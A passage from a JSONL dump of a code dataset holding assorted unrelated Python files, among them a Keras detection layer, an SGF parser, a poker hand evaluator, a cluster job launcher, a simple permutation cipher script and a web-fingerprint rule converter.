Load failed...\")\n\noutputs = sess.run(outputs_)\nsamples = outputs[nb_layers - 1]\nsamples = np.add(samples, 1) * 127.5\n\nfolder_generation = 'generation_from_' + ckpt_name\nfolder_generation = os.path.join(dir_experiment, folder_generation)\n\nif not os.path.exists(folder_generation):\n os.makedirs(folder_generation)\n\nfor idx_sample in range(FLAGS.nb_samples):\n for idx_layer in range(nb_layers - 1):\n channels = np.rollaxis(outputs[idx_layer][idx_sample, :, :, :], 2)\n grid = create_square_grid(channels)\n filename = os.path.join(folder_generation, str(idx_layer))\n plot_images([grid], plot_now=False, save=True, file_name=filename)\n\nsess.close()\n","sub_path":"debugging_activations.py","file_name":"debugging_activations.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"92563851","text":"import random\n\ndef intInput(mi, ma):\n i = input()\n while (not(i.isnumeric()) or int(i) > ma or int(i) < mi):\n print(\"Not a allowable answer please type in a number between \"+str(mi)+\" and \"+str(ma))\n i = input()\n i = int(i)\n return i\n\ndef roll (n,d,m): # nDd+m\n i = m\n for n in range(0,n):\n i += random.randint(1,d)\n return i","sub_path":"SilverDiskHall/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"173465876","text":"import numpy as np\n\nimport keras\nfrom .. import backend\nfrom ..utils import anchors as util_anchors\n\nclass Anchors(keras.layers.Layer):\n def __init__(self, size, stride, ratios=None, scales=None, *args, **kwargs):\n self.size = size\n self.stride = stride\n self.ratios = ratios\n self.scales = scales\n\n if ratios is None:\n self.ratios = np.array([0.5, 1, 2], keras.backend.floatx())\n else:\n self.ratios = np.array(self.ratios, keras.backend.floatx())\n\n if scales is None:\n self.scales = np.array([2 ** 0, 2 ** (1.0 / 3.0), 2 ** (2.0 / 3.0)], keras.backend.floatx()),\n else:\n self.scales = np.array(self.scales, keras.backend.floatx())\n\n self.num_anchors = len(self.ratios) * len(self.scales)\n self.anchors = keras.backend.variable(util_anchors.generate_anchors(\n base_size = self.size,\n ratios = self.ratios,\n scales = self.scales\n ))\n\n super(Anchors, self).__init__(*args, **kwargs)\n\n def call(self, inputs, **kwargs):\n # get height and with as well as number of images\n input_shape = keras.backend.shape(inputs)[:3]\n\n # generate proposals from bbox deltas and shifted anchors\n anchors = backend.shift(input_shape[1:3], self.stride, self.anchors)\n # anchors = backend.shift(inputs.shape[1:3], self.stride, self.anchors)\n anchors = keras.backend.tile(keras.backend.expand_dims(anchors, axis=0), (input_shape[0], 1, 1))\n\n return anchors\n\n def compute_output_shape(self, input_shape):\n if None not in input_shape[1:]:\n total = np.prod(input_shape[1:3]) * self.num_anchors\n return (input_shape[0], total, 4)\n else:\n return (input_shape[0], None , 4)\n\n def get_config(self):\n config = super(Anchors, self).get_config()\n config.update({\n 'size' : self.size,\n 'stride' : self.stride,\n 'ratios' : self.ratios.tolist(),\n 'scales' : self.scales.tolist(),\n })\n\n return config\n\n\nclass RegressBoxes(keras.layers.Layer):\n \"Applies regression on generated anchors\"\n\n def __init__(self, mean=None, std=None, *args, **kwargs):\n if mean is None:\n mean = np.array([0, 0, 0, 0])\n if std is None:\n std = np.array([0.2, 0.2, 0.2, 
0.2])\n\n if isinstance(mean, (list, tuple)):\n mean = np.array(mean)\n elif not isinstance(mean, np.ndarray):\n raise ValueError('Expected mean to be a np.ndarray, list or tuple. Received: {}'.format(type(mean)))\n\n if isinstance(std, (list, tuple)):\n std = np.array(std)\n elif not isinstance(std, np.ndarray):\n raise ValueError('Expected std to be a np.ndarray, list or tuple. Received: {}'.format(type(std)))\n\n self.mean = mean\n self.std = std\n super(RegressBoxes, self).__init__(*args, **kwargs)\n\n def call(self, inputs, **kwargs):\n anchors, regression = inputs\n return backend.bbox_transform_inv(anchors, regression, mean=self.mean, std=self.std)\n\n def compute_output_shape(self, input_shape):\n return input_shape[0]\n\n def get_config(self):\n config = super(RegressBoxes, self).get_config()\n config.update({\n 'mean': self.mean.tolist(),\n 'std' : self.std.tolist(),\n })\n\n return config\n\n\nclass ClipBoxes(keras.layers.Layer):\n def call(self, inputs, **kwargs):\n image, boxes = inputs\n shape = keras.backend.cast(keras.backend.shape(image), keras.backend.floatx())\n\n x1 = backend.clip_by_value(boxes[:, :, 0], 0, shape[2])\n y1 = backend.clip_by_value(boxes[:, :, 1], 0, shape[1])\n x2 = backend.clip_by_value(boxes[:, :, 2], 0, shape[2])\n y2 = backend.clip_by_value(boxes[:, :, 3], 0, shape[1])\n\n return keras.backend.stack([x1, y1, x2, y2], axis=2)\n\n def compute_output_shape(self, input_shape):\n return input_shape[1]\n","sub_path":"keras_pipeline/layers/_detections.py","file_name":"_detections.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"101235413","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# 1、导入模块\nimport xlwt\n# 2、创建workbook(其实就是excel,后来保存一下就行)\nworkbook = xlwt.Workbook(encoding = 'utf-8')\n# 3、创建表\nworksheet=workbook.add_sheet('my sheet')\n# 4、往单元格内写入内容\nworksheet.write(1, 0, label = 'Row 0, Column 0 Value')\n# 5、保存\nworkbook.save('work.xls')","sub_path":"good_script/write_excel.py","file_name":"write_excel.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"154761478","text":"import re\nfrom string import ascii_uppercase\n\nclass SgfTree(object):\n def __init__(self, properties=None, children=None):\n self.properties = properties or {}\n self.children = children or []\n\n def __eq__(self, other):\n if not isinstance(other, SgfTree):\n return False\n for k, v in self.properties.items():\n if k not in other.properties:\n return False\n if other.properties[k] != v:\n return False\n for k in other.properties.keys():\n if k not in self.properties:\n return False\n if len(self.children) != len(other.children):\n return False\n for a, b in zip(self.children, other.children):\n if a != b:\n return False\n return True\n\n def __ne__(self, other):\n return not self == other\n\n\ndef parse(input_string):\n if input_string == \"(;)\": return SgfTree()\n\n input_string = input_string.replace('\\\\[', '<')\n input_string = input_string.replace('\\\\]', '>')\n input_string = input_string.replace('\\t', ' ')\n input_string = input_string.replace('\\n', '_')\n\n nodes_re = r'([A-Z]+(\\[[\\w\\s_<>]+\\])+)+'\n\n result = [match.group(0) for match in re.finditer(nodes_re, input_string)]\n\n if len(result) == 0: raise ValueError('Invalid string!')\n\n children = result[1:] if len(result) > 1 else []\n properties = parse_properties(result)\n\n parsed_properties = {}\n 
parsed_children = [SgfTree(parse_element(element)) for element in children]\n\n    for element in properties:\n        parsed_properties.update(parse_element(element))\n\n    return SgfTree(properties=parsed_properties, children=parsed_children)\n\ndef parse_element(element):\n    key = element[0]\n    value = element[1:]\n    value = value.replace('][', '|')\n    value = value.replace(']', '')\n    value = value.replace('[', '')\n    value = value.replace('<', '[')\n    value = value.replace('>', ']')\n    value = value.replace('_', '\\n')\n    value = value.split('|')\n\n    return { key: value }\n\ndef parse_properties(result):\n    properties = result[0]\n    splited = re.split(r'\\][A-Z]{1}', properties)\n    parsed = []\n\n    for i, c in enumerate(splited):\n        to_append = ''\n        if i == 0 and len(splited) == 1:\n            to_append = c\n        elif i == 0:\n            to_append = c + ']'\n        else:\n            to_append = properties[len(''.join(parsed))] + c\n            if i != len(splited) - 1:\n                to_append = to_append + ']'\n\n        parsed.append(to_append)\n\n    return parsed\n","sub_path":"sgf_parsing.py","file_name":"sgf_parsing.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"247773004","text":"import itertools\n\n\ndef numeric_ranks(cards):\n    suits = get_suits(cards)\n    face_numbers = {'A': 14, 'J': 11, 'Q': 12, 'K': 13}\n    for index, card in enumerate(cards):\n        rank = card[0:-1]\n        try: \n            int(rank)\n        except:\n            cards[index] = str(face_numbers[rank])+suits[index]\n    return cards\n\n\ndef get_ranks(cards):\n    cards = numeric_ranks(cards)\n    return [int(card[0:-1]) for card in cards]\n\n\ndef get_suits(cards):\n    return [card[-1] for card in cards]\n\n\ndef evaluate_hand(hand):\n    hand = numeric_ranks(hand)\n    ranks = get_ranks(hand)\n    suits = get_suits(hand)\n    if len(set(hand)) < len(hand) or max(ranks) > 14 or min(ranks) < 1:\n        return 'Error'\n    if isconsecutive(ranks):\n        if all_equal(suits):\n            if max(ranks) == 14:\n                return 'Kuningasvärisuora'\n            return 'Värisuora'\n        return 'Suora'\n    if all_equal(suits):\n        return 'Väri'\n    total = sum([ranks.count(x) for x in ranks])\n    hand_names = {\n        17: \"Neloset\",\n        13: \"Täyskäsi\",\n        11: \"Kolmoset\",\n        9: \"Kaksi paria\",\n        7: \"Pari\",\n        5: \"Korkein kortti\"\n    }\n    return hand_names[total]\n\n\ndef all_equal(lst):\n    return len(set(lst)) == 1\n\n\ndef show_cards(cards):\n    cards = sort_cards(cards)\n    all_suits = ['C','D','H','S']\n    symbols = dict(zip(all_suits,['\\u2667','\\u2662','\\u2661','\\u2664']))\n    faces = {14: 'A', 11: 'J', 12: 'Q', 13: 'K'}\n    card_symbols = []\n    for card in cards: \n        rank = card[0:-1]\n        if int(rank) in faces:\n            card_symbols.append(faces[int(rank)] + symbols[card[-1]])\n        else:\n            card_symbols.append(rank + symbols[card[-1]])\n    for symbol in card_symbols:\n        print(symbol, end = ' ')\n    print('')\n    return card_symbols\n\ndef isconsecutive(lst):\n    return len(set(lst)) == len(lst) and max(lst) - min(lst) == len(lst) - 1 \n\n\ndef sort_cards(cards):\n    cards = numeric_ranks(cards)\n    rank_list = get_ranks(cards)\n    new_order = sorted((e,i) for i,e in enumerate(rank_list))\n    unsorted_cards = list(cards)\n    for index, (a, b) in enumerate(new_order):\n        cards[index] = unsorted_cards[b]\n    return cards\n\n\ndef get_best_hand(cards):\n    all_hand_combos = itertools.combinations(cards, 5) \n    hand_name_list = [\n        'Error',\n        'Korkein kortti',\n        'Pari',\n        'Kaksi paria',\n        'Kolmoset',\n        'Väri',\n        'Suora',\n        'Täyskäsi',\n        'Neloset',\n        'Värisuora',\n        'Kuningasvärisuora'\n    ]\n    num_hand_names = len(hand_name_list)\n    max_value = 0\n    best_hands = {x: [] for x in 
range(num_hand_names)}\n for combo in all_hand_combos:\n hand = list(combo)\n hand_name = evaluate_hand(hand)\n hand_value = hand_name_list.index(hand_name)\n if hand_value >= max_value:\n max_value = hand_value\n best_hands[hand_value].append(hand) \n max_hand_idx = max(k for k, v in best_hands.items() if len(best_hands[k])>0)\n rank_sum, max_sum = 0, 0\n for hand in best_hands[max_hand_idx]: \n ranks = get_ranks(hand)\n rank_sum = sum(ranks)\n if rank_sum > max_sum:\n max_sum = rank_sum\n best_hand = hand \n return best_hand\n\ntable = ['2H', '5C', 'AC', 'AD', '6C']\nhand = ['7C','AS']\ncards = hand + table\nbest_hand = get_best_hand(cards)\n\nprint(\"Pelaajalle jaetut kortit:\")\nshow_cards(hand), print('')\n\nprint(\"Pöydälle jaetut kortit:\")\nshow_cards(table), print('')\n\nprint(\"Paras mahdollinen pelattava käsi:\")\nshow_cards(best_hand)\n\nprint(evaluate_hand(best_hand))\n","sub_path":"Pokeri.py","file_name":"Pokeri.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"13098686","text":"\"\"\"\nMiscellaneous tools.\n\"\"\"\n\ndef build_cext(name):\n \"\"\"\n Build C extension.\n \"\"\"\n import os\n from distutils.core import setup, Extension\n import numpy as np\n cwd = os.getcwd()\n os.chdir(os.path.dirname(__file__))\n incl = [np.get_include()]\n ext = [Extension(name, [name + '.c'], include_dirs=incl)]\n setup(ext_modules=ext, script_args=['build_ext', '--inplace'])\n os.chdir(cwd)\n return\n\n\ndef build_fext(name):\n \"\"\"\n Build Fortran extension.\n \"\"\"\n import os, shlex\n from numpy.distutils.core import setup, Extension\n fopt = shlex.split(configure().f2py_flags)\n cwd = os.getcwd()\n os.chdir(os.path.dirname(__file__))\n ext = [Extension(name, [name + '.f90'], f2py_options=fopt)]\n setup(ext_modules=ext, script_args=['build_ext', '--inplace'])\n os.chdir(cwd)\n return\n\n\ndef archive(path):\n import os, gzip, cStringIO\n try:\n import git\n assert git.__version__ > '0.2'\n except (ImportError, AssertionError):\n print('Warning: Source code not archived. Source archiving')\n print('improves reproducibility by storing the exact code')\n print('version with the simulations results. 
To enable, use Git')\n print('versioned source code and install GitPython version > 2.0')\n else:\n p = os.path.dirname(__file__)\n r = git.Repo(p)\n s = cStringIO.StringIO()\n r.archive(s, prefix='coseis/')\n s.reset()\n gzip.open(path, 'wb').write(s.read())\n\n\nclass storage(dict):\n __doc__ = None\n def __setitem__(self, key, val):\n v = self[key]\n if val != None and v != None and type(val) != type(v):\n if not isinstance(val, basestring) or not isinstance(v, basestring):\n raise TypeError(key, v, val)\n dict.__setitem__(self, key, val)\n return\n #def __setattr__(self, key, val):\n # self[key] = val\n # return\n #def __getattr__(self, key):\n # return self[key]\n\n\ndef hostname():\n import os, yaml, socket\n h = os.uname()\n g = socket.getfqdn()\n host = ' '.join([h[0], h[4], h[1], g])\n f = os.path.dirname(__file__)\n f = os.path.join(f, 'conf', 'hostmap.yaml')\n d = yaml.load(open(f))\n for m, h in d:\n if h in host:\n return host, m\n return host, 'Default'\n\n\ndef configure(args=None, defaults=None, **kwargs):\n import os, sys, pwd, json, yaml, multiprocessing\n\n # defaults\n if args == None:\n args = {}\n args.update(kwargs)\n path = os.path.dirname(__file__)\n path = os.path.join(path, 'conf') + os.sep\n f = path + 'default.yaml'\n job = yaml.load(open(f))\n job = storage(**job)\n job['argv'] = sys.argv[1:]\n job['host'], job['machine'] = hostname()\n job['maxcores'] = multiprocessing.cpu_count()\n if defaults != None:\n job.update(defaults)\n\n # email\n try:\n import configobj\n f = os.path.expanduser('~')\n f = os.path.join(f, '.gitconfig')\n job['email'] = configobj.ConfigObj(f)['user']['email']\n except:\n job['email'] = pwd.getpwuid(os.geteuid())[0]\n\n # merge arguments, 1st pass\n for k in args:\n job[k] = args[k]\n\n # merge machine parameters\n if job['machine'] and job['machine'].lower() != 'default':\n f = path + job['machine'] + '.yaml'\n m = yaml.load(open(f))\n job.update(m)\n #for h, o in job['host_opts'].items():\n # if h in job['host']:\n # for k, v in o.items():\n # job[k] = v\n\n # arguments, 2nd pass\n for k in args:\n job[k] = args[k]\n\n # command line parameters\n for i in job['argv']:\n if not i.startswith('--'):\n raise Exception('Bad argument ' + i)\n k, v = i[2:].split('=')\n if len(v) and not v[0].isalpha():\n v = json.loads(v)\n job[k] = v\n\n return job\n\n\ndef prepare(job=None, **kwargs):\n \"\"\"\n Compute and display resource usage\n \"\"\"\n import os, time\n\n # prepare job\n if job is None:\n job = configure(**kwargs)\n else:\n for k in kwargs:\n job[k] = kwargs[k]\n\n # misc\n job.update({\n 'jobid': '',\n 'date': time.strftime('%Y-%m-%d'),\n })\n\n # mode options\n k = job['mode']\n d = job['mode_opts']\n if k in d:\n job.update(d[k])\n\n # dependency\n if job['depend']:\n job['depend_flag'] = job['depend_flag'].format(depend=job['depend'])\n else:\n job['depend_flag'] = ''\n\n # notification\n if job['nproc'] > job['notify_threshold']:\n job['notify_flag'] = job['notify_flag'].format(email=job['email'])\n else:\n job['notify_flag'] = ''\n\n # queue options\n opts = job['queue_opts']\n if opts == []:\n opts = [(job['queue'], {})]\n elif job['queue']:\n opts = [d for d in opts if d[0] == job['queue']]\n if len(opts) == 0:\n raise Exception('Error: unknown queue: %s' % job['queue'])\n\n # loop over queue configurations\n for q, d in opts:\n job['queue'] = q\n job.update(d)\n\n # additional job parameters\n job.update({\n 'nodes': 1,\n 'cores': job['nproc'],\n 'ppn': job['nproc'],\n 'totalcores': job['nproc'],\n 'ram': 0,\n 'walltime': 
'',\n 'submission': '',\n })\n\n # processes\n r = job['ppn_range']\n if not r:\n r = range(1, job['maxcores'] + 1)\n job['nodes'] = min(job['maxnodes'], (job['nproc'] - 1) // r[-1] + 1)\n job['ppn'] = (job['nproc'] - 1) // job['nodes'] + 1\n for i in r:\n if i >= job['ppn']:\n break\n job['ppn'] = i\n job['totalcores'] = job['nodes'] * job['maxcores']\n\n # memory\n if not job['pmem']:\n job['pmem'] = job['maxram'] // job['ppn']\n job['ram'] = job['pmem'] * job['ppn']\n\n # SU estimate and wall time limit\n # FIXME???\n m = job['maxtime']\n job['walltime'] = '%d:%02d:00' % (m // 60, m % 60)\n sus = m // 60 * job['totalcores'] + 1\n\n # if resources exceeded, try another queue\n if job['ppn_range'] and job['ppn'] > job['ppn_range'][-1]:\n continue\n if job['maxtime'] and job['minutes'] > job['maxtime']:\n continue\n break\n\n # threads\n if job['nthread'] < 0 and 'OMP_NUM_THREADS' in os.environ:\n job['nthread'] = os.environ['OMP_NUM_THREADS']\n\n # messages\n if job['verbose'] > 1:\n print('Nodes: %s' % job['nodes'])\n print('Procs per node: %s' % job['ppn'])\n print('Threads per node: %s' % job['nthread'])\n print('RAM per node: %sMb' % job['ram'])\n print('SUs: %s' % sus)\n print('Time: ' + job['walltime'])\n\n # warnings\n if job['verbose']:\n if job['ram'] and job['ram'] > job['maxram']:\n print('Warning: exceeding available RAM per node (%sMb)' % job['maxram'])\n if job['minutes'] > job['maxtime']:\n print('Warning: walltime estimate exceeds limit (%s)' % job['walltime'])\n\n # format commands\n job['execute'] = job['execute'].format(**job)\n job['submit'] = job['submit'].format(**job)\n if job['wrapper']:\n job['wrapper'] = job['wrapper'].format(**job)\n job['submission'] = job['name'] + '.sh'\n else:\n job['submission'] = job['executable']\n\n return job\n\n\ndef launch(job=None, **kwargs):\n import os, re, shlex, subprocess\n\n # prepare job\n if job is None:\n job = prepare(**kwargs)\n else:\n for k in kwargs:\n job[k] = kwargs[k]\n\n # launch\n if job['submit']:\n if job['wrapper']:\n f = job['name'] + '.sh'\n open(f, 'w').write(job['wrapper'])\n os.chmod(f, 755)\n c = shlex.split(job['submit'])\n out = subprocess.check_output(c)\n print(out)\n d = re.search(job['submit_pattern'], out).groupdict()\n job.update(d)\n else:\n c = shlex.split(job['execute'])\n subprocess.check_call(c)\n\n\n return job\n\n","sub_path":"cst/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":8048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"547109098","text":"\nfrom difference_set import DifferenceSet, DifferenceSetJSONEncoder\nfrom difference_line import DifferenceLine\nfrom collated_lines import CollatedLines\nfrom difference_line import DifferenceLineJSONEncoder\nimport json\nfrom ..text import Line, TextJSONEncoder\n\nclass Collation(object):\n\n def __init__(self, base_text, other_texts=[], tokenizer=None, tagger=None):\n \"\"\"Create a structure for capturing the differents between the various elements of a Text\n\n Args:\n base_text (Text): The Document used as a base text\n other_text (Text): The Document used as the variant text\n tokenizer (obj): The tokenizer used in the extraction of features from each line within the texts\n tagger (obj): The part-of-speech tagger used in the analysis of each token\n\n \"\"\"\n\n self.base_text = base_text\n self.other_texts = other_texts\n self.tokenizer = tokenizer\n self.tagger = None\n\n self.titles = []\n self.headnotes = []\n self.body = []\n self.footnotes = {}\n\n 
self.compare(self.other_texts)\n\n def compare(self, other_texts):\n\n # Iterate through each title\n for title_line_index, title_line in enumerate(self.base_text['titles']):\n\n title_line_data = json.loads(title_line)\n collated_titles = CollatedLines(title_line_data, [])\n\n # Iterate through the titles for each variant text\n # Iterate through each text\n for other_text in other_texts:\n for other_text_title_index, other_text_title_line in enumerate(other_text['titles']):\n if other_text_title_index == title_line_index:\n other_title_line_data = json.loads(other_text_title_line)\n collated_titles.add_variant_line(other_title_line_data)\n\n self.titles.append(collated_titles.values())\n\n for headnote_line_index, headnote_line in enumerate(self.base_text['headnotes']):\n\n headnote_line_data = json.loads(headnote_line)\n collated_headnotes = CollatedLines(headnote_line_data, [])\n\n # Iterate through the headnotes for each variant text\n # Iterate through each text\n for other_text in other_texts:\n for other_text_headnote_index, other_text_headnote_line in enumerate(other_text['headnotes']):\n if other_text_headnote_index == headnote_line_index:\n other_headnote_line_data = json.loads(other_text_headnote_line)\n collated_headnotes.add_variant_line(other_headnote_line_data)\n\n self.headnotes.append(collated_headnotes.values())\n\n # Comparing lines in the body of the text\n for body_line_index, body_line in enumerate(self.base_text['body']):\n\n body_line_data = json.loads(body_line)\n collated_body_line = CollatedLines(body_line_data, [])\n\n # Iterate through the body for each variant text\n # Iterate through each text\n for other_text in other_texts:\n for other_text_body_index, other_text_body_line in enumerate(other_text['body']):\n if other_text_body_index == body_line_index:\n other_body_line_data = json.loads(other_text_body_line)\n collated_body_line.add_variant_line(other_body_line_data)\n\n self.body.append(collated_body_line.values())\n\n # Comparing footnotes\n for footnote_line_ref, footnote_line in self.base_text['footnotes'].iteritems():\n\n footnote_line_data = json.loads(footnote_line)\n collated_footnote_line = CollatedLines(footnote_line_data, [])\n\n # Iterate through the body for each variant text\n # Iterate through each text\n for other_text in other_texts:\n for other_text_footnote_line_ref, other_text_footnote_line in other_text['footnotes'].iteritems():\n if other_text_footnote_line_ref == footnote_line_ref:\n other_text_footnote_line_data = json.loads(other_text_footnote_line)\n collated_footnote_line.add_variant_line(other_text_footnote_line_data)\n\n self.footnotes[footnote_line_ref] = collated_footnote_line.values()\n\n def merge(self, new_collation):\n\n self.compare(new_collation.other_texts)\n self.other_texts.extend(new_collation.other_texts)\n","sub_path":"swift_collate/collate/collation.py","file_name":"collation.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"290273680","text":"import pandas as pd\ns1 = u'ÀÁÂÃÈÉÊÌÍÒÓÔÕÙÚÝàáâãèéêìíòóôõùúýĂăĐđĨĩŨũƠơƯưẠạẢảẤấẦầẨẩẪẫẬậẮắẰằẲẳẴẵẶặẸẹẺẻẼẽẾếỀềỂểỄễỆệỈỉỊịỌọỎỏỐốỒồỔổỖỗỘộỚớỜờỞởỠỡỢợỤụỦủỨứỪừỬửỮữỰựỲỳỴỵỶỷỸỹ'\ns0 = u'AAAAEEEIIOOOOUUYaaaaeeeiioooouuyAaDdIiUuOoUuAaAaAaAaAaAaAaAaAaAaAaAaEeEeEeEeEeEeEeEeIiIiOoOoOoOoOoOoOoOoOoOoOoOoUuUuUuUuUuUuUuYyYyYyYy'\n# (1)->(4)->(3)->(1)\n# (2)->(5)->(2)\nsigma = [3, 5, 4, 1, 2]\n# sigma[i] is index of character moved to i\n\n\ndef remove_accents(input_str):\n s = ''\n\n for c in 
input_str:\n if c in s1:\n s += s0[s1.index(c)]\n else:\n s += c\n return s\n\n\ndef remove_accents_of_plaintext(filepath: str):\n df = pd.read_csv(filepath)\n list = df['Name']\n list = [remove_accents(name) for name in list]\n df['Name'] = list\n df.pop('Unnamed: 0')\n df.to_csv(filepath, index=False)\n\n\ndef encrypt_name_by_permutation_sigma(name: str, sigma: list):\n words = name.split(\" \")\n sequence = \"\".join(words)\n n_sigma = len(sigma)\n\n if len(sequence) % n_sigma != 0:\n sequence += \" \"*(n_sigma-len(sequence) % (n_sigma))\n\n print(sequence)\n ciphertext = [sequence[i//len(sigma)*len(sigma)+sigma[i % len(sigma)]-1]\n for i in range(len(sequence))]\n ciphertext = \"\".join(ciphertext)\n\n return ciphertext.replace(\" \", \"\")\n\n\ndef analysis_data(data_path, analysis_path):\n df = pd.read_csv(data_path)\n namelist: list[str] = df[\"Name\"]\n dictionary: dict = {}\n amount_word = 0\n for name in namelist:\n words = name.split(\" \")\n amount_word += 1\n\n word = words[0]\n if word in dictionary:\n dictionary[word] += 1\n else:\n dictionary.update({word: 1})\n key_list: list = list(dictionary.keys())\n key_list.sort(key=lambda x: -dictionary[x])\n newdf = pd.DataFrame({\"word\": key_list, \"portion\": [\n dictionary[key]*100/amount_word for key in key_list]})\n newdf.to_csv(analysis_path, index=False)\n\n\ndef analysis_cipher(data_path, analysis_path, n):\n df = pd.read_csv(data_path)\n namelist: list[str] = df[\"Name\"]\n dictionary: dict = {}\n amount_word = 0\n for name in namelist:\n name = name.replace(\" \", \"\")\n words = [name[i:i+n] for i in range(0, len(name), n)]\n amount_word += 1\n word = words[0]\n if word in dictionary:\n dictionary[word] += 1\n else:\n dictionary.update({word: 1})\n key_list: list = list(dictionary.keys())\n key_list.sort(key=lambda x: -dictionary[x])\n newdf = pd.DataFrame({\"word\": key_list, \"portion\": [\n dictionary[key]*100/amount_word for key in key_list]})\n newdf.to_csv(analysis_path, index=False)\n\n\nanalysis_data(\"data.csv\", \"analysis.csv\")\nencrypt_file(\"plaindata.csv\", 'cipherdata.csv', sigma)\nanalysis_cipher(\"cipherdata.csv\", \"analysis_cipher1.csv\", 1)\nanalysis_cipher(\"cipherdata.csv\", \"analysis_cipher2.csv\", 2)\nanalysis_cipher(\"cipherdata.csv\", \"analysis_cipher3.csv\", 3)\nanalysis_cipher(\"cipherdata.csv\", \"analysis_cipher4.csv\", 4)\nanalysis_cipher(\"cipherdata.csv\", \"analysis_cipher5.csv\", 5)\nanalysis_cipher(\"cipherdata.csv\", \"analysis_cipher6.csv\", 6)\n","sub_path":"sigma/position_permutation.py","file_name":"position_permutation.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479281890","text":"#== == == == == == == == == == == == == == == == == == == == == == == == ==\r\n# Description\r\n# ===================================================\r\n\r\n\"\"\"\r\nFile Name : ScrollFrame.py\r\n\r\nPurpose : Create frame with scroll bar(the transaction frame)\r\n\r\n\"\"\"\r\n# ===================================================\r\n# Imports\r\n# ===================================================\r\nimport Tkinter as tk\r\n\r\n# ===================================================\r\n# Classes\r\n# ===================================================\r\n\r\n\r\nclass ScrollFrame(tk.Frame):\r\n\r\n def __init__(self, parent):\r\n \"\"\"\r\n Enter Statement: the constructor gets upper frame object\r\n Exit Statement: the constructor init and create ScrollFrame object\r\n \"\"\"\r\n 
tk.Frame.__init__(self, parent)\r\n\r\n        #Create the vertical scrollbar\r\n        vscrollbar = tk.Scrollbar(self, orient=tk.VERTICAL)\r\n        vscrollbar.pack(fill=tk.Y, side=tk.RIGHT, expand=tk.FALSE)\r\n\r\n        #Create the canvas of the frame\r\n        canvas = tk.Canvas(self, bd=0, highlightthickness=0, yscrollcommand=vscrollbar.set)\r\n        canvas.pack(side=tk.LEFT, fill=tk.BOTH, expand=tk.TRUE)\r\n\r\n        #Set scroll bar to scroll the canvas y points\r\n        vscrollbar.config(command=canvas.yview)\r\n\r\n        # reset the view\r\n        canvas.xview_moveto(0)\r\n        canvas.yview_moveto(0)\r\n\r\n        # create a frame inside the canvas which will be scrolled with it\r\n        self.interior = interior = tk.Frame(canvas, background=\"black\")\r\n        interior_id = canvas.create_window(0, 0, window=interior,\r\n                                           anchor=tk.NW)\r\n\r\n        def _configure_interior(event):\r\n            \"\"\"\r\n            Enter Statement: the function gets event object\r\n            Exit Statement: the function configures the frame inside the canvas\r\n            Return type: None\r\n            \"\"\"\r\n\r\n            # update the scrollbars to match the size of the inner frame\r\n            size = (interior.winfo_reqwidth(), interior.winfo_reqheight())\r\n            canvas.config(scrollregion=\"0 0 %s %s\" % size)\r\n            if interior.winfo_reqwidth() != canvas.winfo_width():\r\n                # update the canvas's width to fit the inner frame\r\n                canvas.config(width=interior.winfo_reqwidth())\r\n\r\n        interior.bind('<Configure>', _configure_interior)\r\n\r\n        def _configure_canvas(event):\r\n            \"\"\"\r\n            Enter Statement: the function gets event object\r\n            Exit Statement: the function configures the canvas itself\r\n            Return type: None\r\n            \"\"\"\r\n            if interior.winfo_reqwidth() != canvas.winfo_width():\r\n                # update the inner frame's width to fill the canvas\r\n                canvas.itemconfigure(interior_id, width=canvas.winfo_width())\r\n\r\n        canvas.bind('<Configure>', _configure_canvas)\r\n\r\n","sub_path":"Blockchain Files/ScrollFrame.py","file_name":"ScrollFrame.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"185413349","text":"import json\nimport re\nimport string\nfrom pathlib import Path\nimport yaml\nimport os\n\nallow_string = string.digits + string.ascii_letters + '-_ '\n\n\ndef is_allow_string(char):\n    if u'\u4e00' <= char <= u'\u9fff' or char in allow_string:\n        return True\n    return False\n\n\ndef replace_name(name):\n    name = name.strip()\n    name = name.replace('（', '(').replace('）', ')')\n    name = re.sub(r\"[(\\[].*?[)\\]]\", \"\", name)\n    name = ''.join([s for s in name if is_allow_string(s)])\n    name = name.strip().replace(' ', '-').replace('--', '-').replace('--', '-')\n    return name.lower()\n\n\ndef valid_fingerprint(rule):\n    fields = ['name', 'path', 'status_code', 'keyword', 'headers', 'favicon_hash', 'priority']\n    if all([key in rule for key in fields]):\n        for key in list(rule):\n            if key not in fields:\n                rule.pop(key)\n        return rule\n    else:\n        print(\"incomplete rule fields\", rule)\n        return None\n\n\ndef fingerprint_json_generator(path):\n    fingerprint_all_dict = {}\n    for site, site_list, file_list in os.walk(path):\n        for file_name in file_list:\n            print(file_name)\n            abs_filename = os.path.abspath(os.path.join(site, file_name))\n            with open(abs_filename) as y:\n                y_dict = yaml.safe_load(y)\n                name = replace_name(y_dict.get('name', ''))\n                fingerprint_rules = y_dict.get('fingerprint', [])\n                for rule in fingerprint_rules:\n                    rule['name'] = name\n                    valid_rule = valid_fingerprint(rule)\n                    if valid_rule:\n                        path = rule.pop('path')\n                        if path not in fingerprint_all_dict:\n                            fingerprint_all_dict.setdefault(path, [valid_rule])\n                        
